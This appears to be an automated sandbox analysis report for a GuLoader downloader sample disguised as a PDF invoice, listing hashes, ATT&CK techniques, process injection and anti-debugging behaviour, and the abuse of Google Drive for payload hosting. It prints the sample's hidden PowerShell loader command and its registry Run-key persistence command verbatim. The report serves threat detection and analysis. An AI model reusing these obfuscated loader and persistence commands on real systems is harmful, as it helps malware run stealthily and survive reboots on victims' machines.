guloader | 705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
02-07-2024 05:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Vyuctovani_2024_07-1206812497·pdf.exe
Size

892KB
MD5

3fb7cb8d7fd9efd2bc0cae35eb42c4fe
SHA1

ce06ab538757edb9b1d4cce656006da0d3795bb1
SHA256

705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
SHA512

97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694
SSDEEP

24576:JOreqxsYYU8rG98siSVrcQ8EO0fG5vq7He:JOCgLY69PRxfyq7+

Score

10^/10

guloader downloader execution persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

660 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exeNubilum.exe

pid process

660 powershell.exe
844 Nubilum.exe

pid	process
660	powershell.exe

pid	process
660	powershell.exe
844	Nubilum.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\husmndenes = "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\\Bukkespringenes\\').Hovedstads;%tomboyism% ($Eftertaklede)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

3 drive.google.com
5 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

Nubilum.exe

pid process

844 Nubilum.exe
844 Nubilum.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeNubilum.exe

pid process

660 powershell.exe
844 Nubilum.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 660 set thread context of 844 660 powershell.exe Nubilum.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2468 reg.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid process

660 powershell.exe
660 powershell.exe
660 powershell.exe
660 powershell.exe
660 powershell.exe
660 powershell.exe
660 powershell.exe
660 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

660 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 660 powershell.exe

flow	ioc
3	drive.google.com
5	drive.google.com

pid	process
844	Nubilum.exe
844	Nubilum.exe

pid	process
660	powershell.exe
844	Nubilum.exe

description	pid	process	target process
PID 660 set thread context of 844	660	powershell.exe	Nubilum.exe

pid	process
2468	reg.exe

pid	process
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe

pid	process
660	powershell.exe

description	pid	process
Token: SeDebugPrivilege	660	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

Vyuctovani_2024_07-1206812497·pdf.exepowershell.exeNubilum.execmd.exe

description	pid	process	target process
PID 1200 wrote to memory of 660	1200	Vyuctovani_2024_07-1206812497·pdf.exe	powershell.exe
PID 1200 wrote to memory of 660	1200	Vyuctovani_2024_07-1206812497·pdf.exe	powershell.exe
PID 1200 wrote to memory of 660	1200	Vyuctovani_2024_07-1206812497·pdf.exe	powershell.exe
PID 1200 wrote to memory of 660	1200	Vyuctovani_2024_07-1206812497·pdf.exe	powershell.exe
PID 660 wrote to memory of 844	660	powershell.exe	Nubilum.exe
PID 660 wrote to memory of 844	660	powershell.exe	Nubilum.exe
PID 660 wrote to memory of 844	660	powershell.exe	Nubilum.exe
PID 660 wrote to memory of 844	660	powershell.exe	Nubilum.exe
PID 660 wrote to memory of 844	660	powershell.exe	Nubilum.exe
PID 660 wrote to memory of 844	660	powershell.exe	Nubilum.exe
PID 844 wrote to memory of 1196	844	Nubilum.exe	cmd.exe
PID 844 wrote to memory of 1196	844	Nubilum.exe	cmd.exe
PID 844 wrote to memory of 1196	844	Nubilum.exe	cmd.exe
PID 844 wrote to memory of 1196	844	Nubilum.exe	cmd.exe
PID 1196 wrote to memory of 2468	1196	cmd.exe	reg.exe
PID 1196 wrote to memory of 2468	1196	cmd.exe	reg.exe
PID 1196 wrote to memory of 2468	1196	cmd.exe	reg.exe
PID 1196 wrote to memory of 2468	1196	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\Vyuctovani_2024_07-1206812497·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Vyuctovani_2024_07-1206812497·pdf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:660

C:\Users\Admin\AppData\Local\Temp\Nubilum.exe
"C:\Users\Admin\AppData\Local\Temp\Nubilum.exe"
3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
4⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
5⤵
- Adds Run key to start application
- Modifies registry key
PID:2468

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\twinsomeness\Nyde.Hal
Filesize
314KB

MD5
7ff3d5bfd31d06f172660bc9457c8bdf

SHA1
9d84f647eab98d98e4c9f77e3bc29ca213063ac7

SHA256
a44b7bed6111afa49d3955e6a7e267f090fbfc78fdb766cb882c41af59af8e99

SHA512
2b9b4c5abf7f6270903a0456dd596a7051be854886951719de7b625aae0f30651685d2cb8e0fa78c8977bae181e642fbf7381673f7701424ff7a19170ed806a2

Download Submit
C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28
Filesize
71KB

MD5
a722a8ee65ce2bf5d2fbd7450d8fe960

SHA1
2992f4b10c0e3d771862c5204b9b304ec2e50634

SHA256
feb62e067d0cd459bc5c93ac7dcb76062257d26d8fb47e9b9e9f9d94c6706ae3

SHA512
0052efd489bba988c6147bfcc5acb6fccd81ff5a54f9b75c98dd69426c5d1a99513d89f17942d6606cb8786515ff3a35c7c862b7db8f3a12b1ecba63a9df8db9

Download Submit
\Users\Admin\AppData\Local\Temp\Nubilum.exe
Filesize
892KB

MD5
3fb7cb8d7fd9efd2bc0cae35eb42c4fe

SHA1
ce06ab538757edb9b1d4cce656006da0d3795bb1

SHA256
705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5

SHA512
97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694

Download Submit
memory/660-18-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/660-15-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/660-13-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/660-11-0x0000000073A91000-0x0000000073A92000-memory.dmp

Filesize
4KB

Download
memory/660-14-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/660-20-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/660-21-0x0000000006740000-0x0000000007224000-memory.dmp

Filesize
10.9MB

Download
memory/660-12-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/660-26-0x0000000073A90000-0x000000007403B000-memory.dmp

Filesize
5.7MB

Download
memory/844-33-0x0000000000840000-0x00000000018A2000-memory.dmp

Filesize
16.4MB

Download
memory/844-49-0x00000000018B0000-0x0000000002394000-memory.dmp

Filesize
10.9MB

Download